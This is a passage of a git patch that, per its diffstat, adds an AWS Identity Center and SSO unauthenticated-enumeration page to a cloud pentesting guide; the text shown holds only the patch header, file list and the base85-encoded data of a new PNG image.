From f3c5b4cc9e3dc772a44997da7e355611ab35e2ff Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Mon, 1 Apr 2024 09:21:45 +0000
Subject: [PATCH] GITBOOK-605: change request with no subject merged in GitBook

---
 .gitbook/assets/image (154).png               | Bin 0 -> 20439 bytes
 SUMMARY.md                                    |   3 +-
 .../aws-security/aws-services/aws-iam-enum.md |  16 +-
 ...ity-center-and-sso-unauthenticated-enum.md | 155 ++++++++++++++++++
 4 files changed, 168 insertions(+), 6 deletions(-)
 create mode 100644 .gitbook/assets/image (154).png
 create mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md

diff --git a/.gitbook/assets/image (154).png b/.gitbook/assets/image (154).png
new file mode 100644
index 0000000000000000000000000000000000000000..56486f01a15443b98d9469d60db1ea565ace761a
GIT binary patch
literal 20439
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
